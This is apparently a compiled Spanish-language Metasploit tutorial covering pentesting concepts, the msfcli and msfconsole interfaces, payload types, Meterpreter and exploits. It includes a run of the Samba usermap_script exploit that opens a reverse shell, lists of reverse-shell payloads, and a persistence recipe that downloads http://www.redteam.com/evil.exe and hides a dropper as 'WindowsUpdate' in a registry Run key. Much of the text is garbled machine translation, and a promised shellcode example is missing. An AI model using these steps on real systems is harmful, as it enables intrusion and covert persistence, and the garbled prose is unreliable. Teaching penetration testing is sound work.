Você está na página 1de 21

Bienvenido metasploit

Metasploits framework
Metasploit es un proyecto open source de seguridad informtica que proporciona
informacin acerca devulnerabilidades de seguridad y ayuda en tests de penetracin y en
el desarrollo de firmas para sistemas de deteccin de intrusos.
Su subproyecto ms conocido es el Metasploit Framework, una herramienta para
desarrollar y ejecutar exploitscontra una mquina remota. Otros subproyectos importantes
son la bases de datos de opcodes (cdigos de operacin), un archivo de shellcodes, e
investigacin sobre seguridad. Inicialmente fue creado utilizando el lenguaje de
programacin de scripting Perl, aunque actualmente el Metasploit Framework ha sido
escrito de nuevo completamente en el lenguaje Ruby.
lo que se pentesting por qu
uf has de hd
terminologas en requerimiento de meta
practicas el instalacion
conseguir prisa con

captulo 1
arquitectura meta
mixng aos con pluggins a Ruby
chapter2


pentesting
Una prueba de penetracin, o la forma corta pentest, es anualmente ataque fue el
sistema informtico con la intencin de encontrar deficiencias de seguridad,
potencialmente Obtener acceso a la misma, las TIC y las funciones en los datos [1] [no
en la citacin dada (Vase la discusin.)] [2]

El proceso implica la identificacin de los sistemas de destino y el objetivo, entonces la
revisin de la informacin disponible y de entreprise disponible means clustering para
alcanzar la meta. Un blanco de prueba de penetracin puede ser una caja blanca
(Cuando se proporcione toda la informacin de fondo y de sistema) o la caja de negro
(Cuando slo bsico o no se proporciona informacin excepto el nombre de la
empresa). Una prueba de penetracin Podra indicar si un sistema es vulnerable al
ataque, si las defensas eran suficientes y que todos los defensas (si los hay) fueron
derrotados en el ensayo de penetracin. [3]

Una penetracin puede ser comparado con una encuesta a una valla a prueba de
conejos, Todos los cuales debern estar enteros para mantener a los conejos. Al
analizar la cerca el ensayo de penetracin puede identificar un solo agujero lo
suficientemente amplia para un conejo (o ellos mismos) para moverse a travs de, una
vez aprobada la defensa, cualquier revisin adicional, adems de eso no ocurrir la
defensa como la prueba de penetracin se mueve a la siguiente seguridad control.
Esto significa agrupacin puede estar all varios agujeros o vulnerabilidades en la
primera lnea de defensa y el ensayo de penetracin slo el primero se encontr
APROBACIN ya que era una proeza exitosa. Aqu es donde la diferencia radica en
intermediarios evaluacin de la vulnerabilidad y pruebas de penetracin - la evaluacin
de la vulnerabilidad es todo lo que usted puede ser susceptible a la prueba de
penetracin se basa en si la defensa puede ser derrotado [cita requerida].

Los problemas de seguridad descubiertos a travs de la prueba de penetracin se
presentan al dueo del sistema. [Cita requerida] las pruebas de penetracin efectiva se
emparejar esta informacin con evaluacin exacta aos de los impactos potenciales a
la organizacin y esbozar un rango de contramedidas tcnicas y de procedimiento a
para reducir riesgos. [cita requerida]

Las pruebas de penetracin son valiosos por varias razones: [cita requerida]

La determinacin de la viabilidad de un conjunto de vectores de ataque especial
Identificar las vulnerabilidades de alto riesgo son el resultado de una combinacin que
de menor riesgo vulnerabilidades explotadas en una secuencia particular
Identificar las vulnerabilidades que pueden ser dificultad o no para detectar con la red
automatizada de software de anlisis de vulnerabilidades o aplicacin
La evaluacin de la magnitud de los posibles impactos comerciales y operacionales de
ataques exitosos
Prueba de la capacidad de los defensores de la red para detectar con xito y responde
a los ataques
Proporcionar evidencia para apoyar una mayor inversin en el personal de seguridad y
tecnologa
Pruebas de penetracin son un componente de una auditora de seguridad completa.
Por ejemplo, el Payment Card Industry Estndar de Seguridad de Datos (PCI DSS), y el
estndar de seguridad y auditora, requiere tanto de las pruebas de penetracin
trimestral y Permanente (despus de los cambios del sistema). [4
HD Moore es el desarrollador de Metasploit Framework, un conjunto de software de
pruebas de penetracin, y el fundador de theMetasploit Proyecto. Reservas HD tienen
ahora director de investigaciones de Boston, la firma de seguridad basada MA Rapid7,
un proveedor lder de soluciones de software de seguridad de datos y de anlisis y en
la nube.
Moore fund el Proyecto Metasploit en el verano de 2003 con el objetivo de
convertirse en un recurso pblico para la explotacin de la investigacin de cdigo y el
desarrollo. [1] l es tambin conocido por su trabajo en WARVOX, hachero, el destape
del motor Metasploit y la deteccin Enlace Rogue Red Herramientas. [2]
Moore Desarrollado utilidades de software de seguridad para el Departamento de
Defensa de los Estados Unidos. Comenz aussi una iniciativa "Mes de errores del
navegador" (Mobb) como experimento ao en el descubrimiento de vulnerabilidades
de ritmo rpido con la divulgacin completa. Esto comenz theMonth de insectos
mismo proyecto, y dio lugar a enorme cantidad de parches de seguridad del navegador
y Medidas mejoradas.
Moore es director de investigaciones de Rapid7 en Greater Austin, Texas; l sigue
siendo el principal arquitecto de Metasploit Framework. [

msfcli : Potente msfcli la proporciona una interfaz de lnea de comandos para el
marco. Esto le permite aadir hazaas Metasploit fcilmente en cualquier guiones se
crean de mayo.

root@kali:~# msfcli -h
Usage: /usr/bin/msfcli [mode]
===========================================================

Mode Description
---- -----------
(A)dvanced Show available advanced options for this module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
(H)elp You're looking at it baby!
(I)DS Evasion Show available ids evasion options for this module
(O)ptions Show available options for this module
(P)ayloads Show available payloads for this module
(S)ummary Show information about this module
(T)argets Show available targets for this exploit module

Examples:
msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP
E
msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post=
nop= E
.
Tenga en cuenta que cuando se utiliza msfcli, variables asignadas estn usando
= y que todas las opciones son maysculas y minsculas

root@kali:~# msfcli exploit/multi/samba/usermap_script RHOST=172.16.194.172
PAYLOAD=cmd/unix/reverse LHOST=172.16.194.163 E
[*] Please wait while we load the module tree...

## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##


=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 936 exploits - 500 auxiliary - 151 post
+ -- --=[ 252 payloads - 28 encoders - 8 nops
=[ svn r15767 updated today (2012.08.22)

RHOST => 172.16.194.172
PAYLOAD => cmd/unix/reverse
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo cSKqD83oiquo0xMr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "cSKqD83oiquo0xMr\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.194.163:4444 ->
172.16.194.172:57682) at 2012-06-14 09:58:19 -0400

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC
2008 i686 GNU/Linux


Si no est seguro acerca de qu opciones Completamente pertenecen a un
mdulo en particular, puede aadir la letra S al final de la cadena en el que
elemento que est atascado.


root@kali:~# msfcli exploit/multi/samba/usermap_script O
[*] Initializing modules...

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port


Para mostrar las cargas tiles disponibles que son para el mdulo actual anexar
la letra P a la cadena de la lnea de comandos.


root@kali:~# msfcli exploit/multi/samba/usermap_script P
[*]Initializing modules...

Compatible payloads
===================

Name Description
---- -----------
cmd/unix/bind_awk Listen for a connection and
spawn a command shell via GNU AWK
cmd/unix/bind_inetd Listen for a connection and
spawn a command shell (persistent)
cmd/unix/bind_lua Listen for a connection and
spawn a command shell via Lua
cmd/unix/bind_netcat Listen for a connection and
spawn a command shell via netcat
cmd/unix/bind_netcat_gaping Listen for a connection and
spawn a command shell via netcat
cmd/unix/bind_netcat_gaping_ipv6 Listen for a connection and
spawn a command shell via netcat
cmd/unix/bind_perl Listen for a connection and
spawn a command shell via perl
cmd/unix/bind_perl_ipv6 Listen for a connection and
spawn a command shell via perl
cmd/unix/bind_ruby Continually listen for a
connection and spawn a command shell via Ruby
cmd/unix/bind_ruby_ipv6 Continually listen for a
connection and spawn a command shell via Ruby
cmd/unix/bind_zsh
Listen for a connection and spawn a command shell via Zsh.
Note: Although Zsh is
often available, please be aware it isn't usually installed by
default.

cmd/unix/generic Executes the supplied command
cmd/unix/reverse Creates an interactive shell
through two inbound connections
cmd/unix/reverse_awk Creates an interactive shell
via GNU AWK
cmd/unix/reverse_lua Creates an interactive shell
via Lua
cmd/unix/reverse_netcat Creates an interactive shell
via netcat
cmd/unix/reverse_netcat_gaping Creates an interactive shell
via netcat
cmd/unix/reverse_openssl Creates an interactive shell
through two inbound connections
cmd/unix/reverse_perl Creates an interactive shell
via perl
cmd/unix/reverse_perl_ssl Creates an interactive shell
via perl, uses SSL
cmd/unix/reverse_php_ssl Creates an interactive shell
via php, uses SSL
cmd/unix/reverse_python Connect back and create a
command shell via Python
cmd/unix/reverse_python_ssl Creates an interactive shell
via python, uses SSL, encodes with base64 by design.
cmd/unix/reverse_ruby Connect back and create a
command shell via Ruby
cmd/unix/reverse_ruby_ssl Connect back and create a
command shell via Ruby, uses SSL
cmd/unix/reverse_ssl_double_telnet Creates an interactive shell
through two inbound connections, encrypts using SSL via "-z" option
cmd/unix/reverse_zsh
Connect back and create a command shell via Zsh. Note:
Although Zsh is often
available, please be aware it isn't usually installed by
default.




Beneficios de mscli

Apoya el Lanzamiento de exploits y mdulos auxiliares
til para tareas especficas
Bueno para el aprendizaje
Cmodo de usar Cuando se prueba o desarrollo de una nueva hazaa
Buena herramienta para la operacin de una sola vez
Excelente si usted sabe exactamente todos los que explotan y las opciones que usted
necesita
Maravilloso para su uso en secuencias de comandos y automatizacin bsica

El nico inconveniente real de msfcli es que no se admite tan bien como pueda y
msfconsole slo manejan una cscara a la vez, por lo que es poco prctico para
injustement ataques del lado del cliente. Se aussi no apoya ninguna de las caractersticas
avanzadas de automatizacin de msfconsole


Msfconsole: msfconsole
El msfconsole es probablemente la interfaz ms popular para el MSF. Se la ofrece una
consola centralizada "todo-en-uno" y le permite acceder eficiente Prcticamente todas
las opciones disponibles en el marco de Metasploit. Msfconsole Que SCCM intimidante
al principio, una vez que aprenda el propsito de la sintaxis de los comandos que
aprender a apreciar el poder de la utilizacin de esta interfaz.
Beneficios
Es la nica forma compatible para acceder a las caractersticas de la mayora dentro de
Metasploit.
Proporciona una interfaz basada en consola para el marco
Contiene la mayora de caractersticas y es la interfaz de MSF ms estable
Apoyo, tabulacin, y la terminacin de comandos readline completa
Ejecucin de comandos externos en msfconsole es posible:
msf > ping -c 1 192.168.1.100
[*] exec: ping -c 1 192.168.1.100

PING 192.168.1.100 (192.168.1.100) 56(84) bytes of data.
64 bytes from 192.168.1.100: icmp_seq=1 ttl=128 time=10.3 ms

--- 192.168.1.100 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 10.308/10.308/10.308/0.000 ms
msf >

Lanzamiento
El msfconsole Lanzan simplemente ejecutando msfconsole desde la lnea de
comandos. msfconsole Est situado en el directorio /usr/share/metasploit-
framework/msfconsole directory.
root@kali:# msfconsole

## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##


=[ metasploit v4.8.2-2014021901 [core:4.8 api:1.0] ]
+ -- --=[ 1265 exploits - 695 auxiliary - 202 post ]
+ -- --=[ 330 payloads - 32 encoders - 8 nops ]


msf >

Help
You can pass -h to msfconsole to see the other usage options available to you.
root@kali:~# msfconsole -h
Usage: msfconsole [options]

Specific options:
-d Execute the console as defanged
-r Execute the specified resource file
-o Output to the specified file
-c Load the specified configuration file
-m Specifies an additional module search path
-p Load a plugin on startup
-y, --yaml Specify a YAML file containing database
settings
-M, --migration-path
Specify a directory containing additional DB migrations
-e , Specify the database environment to load from the
YAML
--environment
-v, --version Show version
-L, --real-readline Use the system Readline
library instead of RbReadline
-n, --no-database Disable database support
-q, --quiet Do not print the banner on
start up
-x Execute the specified string as
console commands (use ; for multiples)

Common options:
-h, --help Show this message

Entrando ayuda o una? onza en el smbolo del sistema MSF mostrar una lista de
comandos disponibles junto con una descripcin de lo que son para el Cultivo.
msf > help

Core Commands
=============

Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
help Help menu
info Displays information about one or more module
irb Drop into irb scripting mode
jobs Displays and manages jobs
kill Kill a job
load Load a framework plugin
loadpath Searches for and loads modules from a path
makerc Save commands entered since start to a file
quit Exit the console
reload_all Reloads all modules from all defined module paths
resource Run the commands stored in a file
...snip...


Tab Completion
The msfconsole is designed to be fast to use and one of the features that helps
this goal is tab completion. With the wide array of modules available, it can be
difficult to remember the exact name and path of the particular module you
wish to make use of. As with most other shells, entering what you know and
pressing 'Tab' will present you with a list of options available to you or auto-
complete the string if there is only one option. Tab completion depends on the
ruby readline extension and nearly every command in the console supports tab
completion.
use exploit/windows/dce
use .*netapi.*
set LHOST
show
set TARGET
set PAYLOAD windows/shell/
exp

msf > use exploit/windows/smb/ms
use exploit/windows/smb/ms03_049_netapi
use exploit/windows/smb/ms04_007_killbill
use exploit/windows/smb/ms04_011_lsass
use exploit/windows/smb/ms04_031_netdde
use exploit/windows/smb/ms05_039_pnp
use exploit/windows/smb/ms06_025_rasmans_reg
use exploit/windows/smb/ms06_025_rras
use exploit/windows/smb/ms06_040_netapi
use exploit/windows/smb/ms06_066_nwapi
use exploit/windows/smb/ms06_066_nwwks
use exploit/windows/smb/ms06_070_wkssvc
use exploit/windows/smb/ms07_029_msdns_zonename
use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
use exploit/windows/smb/ms10_061_spoolss
msf > use exploit/windows/smb/ms08_067_netapi



Payloads:
Payloads de Metasploit Explicados - Parte 1
Este artculo se encuentra basado en el post Metasploit Payloads Explained - Part 1 publicado
por Rob Fuller a.k.a @mubix

La seleccin de payloads es algo sobre lo cual raramente se habla en detalle. La mayora de la
pruebas de concepto (PoC) solo utilizan calc.exe, netcat, o alguna clase de socket. La vasta
mayora de tutoriales de Metasploit, videos y documentacin utilizan el
payloadwindows/meterpreter/reverse_tcp el cual es uno de los 224 payloads posibles.
Una pequea advertencia: Ya que los payloads en Metasploit no se actualizan con la misma
frecuencia como otros componentes de Metasploit, este es un punto en la documentacin de
estos (Junio 23, 2011) y los payloads disponibles en Metasploit estn cambiando
constantemente. Los reto a continuar haciendo un 'show payloads' y ver que hay de nuevo.

Si ejecutamos 'show payloads' en la base de la consola de Metasploit (msf>), veremos todos
los payloads disponibles en Metasploit. Sin embargo, los desarrolladores de mdulos de
exploits pueden ayudar un poco al usuario con su seleccin ubicando limitadores especiales
dentro de su mdulo. Estos limitadores pueden ser tan especficos como el apuntar a un
payload especfico, o tan general como el especificar que solo trabajar con un payload de
'windows'. Como ejemplo decente de esta accin revisemos el mdulo de exploit JBoss
"bshdeployer" (modules/exploits/multi/http/jboss_bshdeployer.rb).

Los payloads que tiene Metasploit se desglosan en 'staged', 'stagers', y 'singles (tambin
conocidos como Inline)'. La diferencia entre 'staged' y 'stagers' es muy simple, los payloads
'staged' utilizan pequeos 'stagers' para poder ajustarse en pequeos espacios de
explotacin. Durante la explotacin, el desarrollador del exploit por lo regular tiene una muy
limitada cantidad de memoria que pueda manipular a travs de las entradas de los programas
que estn explotando. Los stagers van en este espacio y su nico trabajo derribar el resto del
payload 'staged'. La desventaja de este tipo de payloads es que requieren una conexin a algo
que les palanquear el resto del payload. Los payloads Inline o 'singles' no tienen este
problema. Estos se encuentran auto-contenidos y hacen lo que estan diseados a hacer sin
asistencia alguna.

Todos los exploits en Metasploit utilizan el nico y conocido Multi Handler. Lo podemos llamar
as por la forma en como lo invocamos:

?
1
msf> use multi/handler

Es un ttulo apropiado, ya que se encuentra equipado para manejar cada uno de los exploits
dentro de Metasploit sin importar la arquitectura o el tipo de conexin que se est haciendo.
Sabe cmo tratar con cada tipo de payload porque le decimos que esperar, pero eso no quita el
hecho de que en esta sencilla utilidad se encuentra el escaln fundamental para todas la
explotaciones con Metasploit.

La estructura de la mayora de los payloads dice exactamente lo que hacen, pero no siempre.
Si dice en la descripcin que en un payload "Inline" eso significa es que es un
payload single (independiente), si dice que es un "Stager" significa que es un payload
montable. Vamos a ver algunos de los menos conocidos:

cmd/windows/adduser - Este es un payload individual que ejecuta "net user /add" con el
nombre de usuario y contrasea que hemos especificado. Este payload no indica que es
"Inline" pero todos los payloads de los grupos "cmd/*" o "*/exec" son individuales.

osx/armle/vibrate - Un payload individual que cuando se ejecuta en un iPhone, lo hace
vibrar.

generic/debug_trap - Dispara un depurador si se adjunta al proceso (envia un byte simple
\xCC 'break')

Una cosa que no es inmediatamente obvia es otro marcador de los payloads montables
(staged) vs. los individuales (singles):

osx/ppc/shell/reverse_tcp
osx/ppc/shell_reverse_tcp

La diferencia entre estos dos payloads no es mas obvia que el hecho que una tiene un
underscore '_' en lugar de un forward slash '/'. El payload con el underscore significa que es un
payload individual mientras que el otro significa que es un payload montable. Pero la
arquitectura de la convencin de nombramiento de estos payloads es un poco complicada. La
mayoria se ajustan a OS/ARCHITECTURE/TYPE/PAYLOAD donde un slash en lugar de un
underscore entre TYPE y PAYLOAD significar la diferencia que acabamos de tratar. Pero no
todos los payloads se ajustan a este formato. Podemos incluso enloquecernos e ir a revisar el
directorio: msfdirectory/modules/payloads/ - todo en el directorio singles, es efectivamente un
payload individual.

Los payloads individuales son los mejores para disparar y olvidarnos de ellos, son utilizados
como payloads para memorias USB (de tal forma que la mquina no tiene que tener una
conexin para hacer lo que se necesita) hasta llegar a un mtodo de persistencia muy astuto.
Uno que he utilizado con frecuencia en CCDC era el del payload: 'windows/download_exec'. La
nica opcin que tiene este payload individual es "URL". Aqui se define algo como
http://www.redteam.com/evil.exe y se genera el binario:


(Si, es posible utilizar msfpayload o msfvenom en la lnea de comando para generar payloads,
pero me gusta permanecer dentro de msfconsole).

Entonces definimos eso a auto iniciar cuando alguien inicie sesin como :

?

meterpreter > reg setval -k "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" -v "WindowsUpdate" -d
"C:\\Windows\\dropper.exe"

Ahora todo lo que tenemos que hacer es esperar por logins. Si sucede que encuentran nuestro
binario evil.exe (el cual download_exec lo hace "a.exe"y lo pone en System32), y bloquean
nuestra IP, todo lo que hacer es reemplazar evil.exe en nuestro servidor web y esperar a que
este descargue uno nuevo. Una forma cruda de persistencia, pero funciona bien.

Yo voy a terminar esto con una lista de todos los payloads... En el prximo artculo veremos
Meterpreter, el mejor payload en mi humilde y totalmente imparcial opinin -;), con un poco de
pivotaje lanzado en buena medida.

METERPRETER
Meterpreter es una impresionante utilidad que permite obtener una gran cantidad de
informacin sobre un objetivo comprometido, as como tambin manipular procesos del
sistema y/o terminarlos. Meterpreter es un interprete de comandos que permite de una
forma segura y suave interactuar con la maquina objetivo ganando por una parte la
flexibilidad de un stagers (ejecucin de mltiples comandos en un payload) y por otra parte,
la fiabilidad de que no ser detectado fcilmente por un antivirus, firewall o IDS ya que se
ejecuta como un proceso en el sistema operativo y no escribe ningn fichero al sistema
remoto.
La comunicacin entre el interprete Meterpreter y la maquina remota es va SSL lo que
quiere decir que la informacin intercambiada entre las dos maquinas viaja cifrada, ademas
es posible utilizar mltiples canales de ejecucin, es decir, mltiples programas ejecutndose
en la maquina remota y todos pueden ser manejados desde meterpreter con los
comandos channel y execute.
Exploit:
es un fragmento de software, fragmento de datos o secuencia de comandos y/o acciones,
utilizada con el fin de aprovechar una vulnerabilidad de seguridad de un sistema de
informacin para conseguir un comportamiento no deseado del mismo. Ejemplos de
comportamiento errneo: Acceso de forma no autorizada, toma de control de un sistema
de cmputo, consecucin privilegios no concedidos lcitamente, consecucin de ataques
de denegacin de servicio. Hay que observar que el trmino no se circunscribe a piezas de
software, por ejemplo cuando lanzamos un ataque de ingeniera social, el ardid o discurso
que preparamos para convencer a la vctima tambin se considera un exploit.
1

Los exploits pueden tomar forma en distintos tipos de software, como por
ejemplo scripts, virus informticos o gusanos informticos,
Shell code
Una shellcode es un conjunto de rdenes programadas generalmente en lenguaje
ensamblador y trasladadas a opcodes que suelen ser inyectadas en la pila (o stack) de
ejecucin de un programa para conseguir que la mquina en la que reside se ejecute la
operacin que se haya programado.
El trmino shellcode deriva de su propsito general, esto era una porcin de
un exploit utilizada para obtener una shell. Este es actualmente el propsito ms comn
con que se utilizan. Para crear una shellcode generalmente suele utilizarse un lenguaje de
ms alto nivel, como es el caso del lenguaje C, para luego, al ser compilado, generar el
cdigo de mquina correspondiente, que es denominado opcode. Un ejemplo de una
shellcode escrita en C:

www.udemy.com/u/hiteshchoudhry
htpps://ww.udemy-com/pentesting_with-
backtrack-lite-version-by-hitesh-
choudhavy/


payloads: Qu es PayLoad?
La semana pasada publicamos un artculo definiendo de forma sencilla Qu es
Exploit?, bueno hoy vamos a continuar un poco ms all explicando un
trminoestrechamente relacionado con exploit, el archiconocido Payload.


Hablbamos de que las vulnerabilidades o errores presentes en cualquier software
pueden ser aprovechadas para producir efectos inesperados en los equipos, una vez
descubierto ese fallo se desarrollaban pequeos programas (exploits) para forzar de
forma especfica ese error en el sistema, y ahora qu?

Adems de conseguir que el software produzca ese error lo ideal sera poder
aprovecharlo para que el equipo realice las funciones que yo desee.
Esa parte del software que nos brinda una funcin ante un error es el Payload, la
ventaja de este planteamiento es que el mismo payload puede ser utilizado por distintos
exploits y un mismo exploit puede utilizar varios payloads, una programacin
modular fantstica, je, je.

Un ejemplo
Se publica una vulnerabilidad conocida en un servidor web muy utilizado, ...cuando
una peticin malformada chuchugua, chuchugua llama a la funcin de php no se qu
que provoca que se pueda X, y permite la ejecucin de cdigo en la maquina del
server.


La comunidad (incluidos los malos) se ponen a trabajar ydesarrollan el software
(exploit)normalmente con lenguajes de programacin rpidos ruby, perl o phyton para
provocar ese error, adems desarrollan o disean ese software para que el fallo permita
sacar ventaja, brindarnos una Shell, screenshot, etc. En muchas ocasiones se
utilizan Payloads ya creados para otros exploits, otras veces hay que disearlos
especficamente para ese exploit.

Navegando un poco por la redno hay mucha informacin sobre este tema, una de
lasdefiniciones ms precisa y adems de una forma muy sencilla de comprender es
la que encontramos en elblog de Eset:


Si queris profundizar un poco ms a nivel tcnico sobre este tema hay unosartculos
increbles de la mano de @DarkOperator en Hacknode.

Seguridad a lo Jabal para Todos!!
Publicado por Seguridad informatica Jabal Contribuciones en 11:19

BLACK-TRACK





Cd /pentest/exploits/framework2

Msf cnsola metaesploit

Search dco
Msf poner exploit
Show options
Set RHOSTponer la ip remota
Show options de Nuevo

Set PAYLOAD windows/shell
Set PAYLOAD windows/shell/bind_tcp
Show options
Exploit

Dir

Você também pode gostar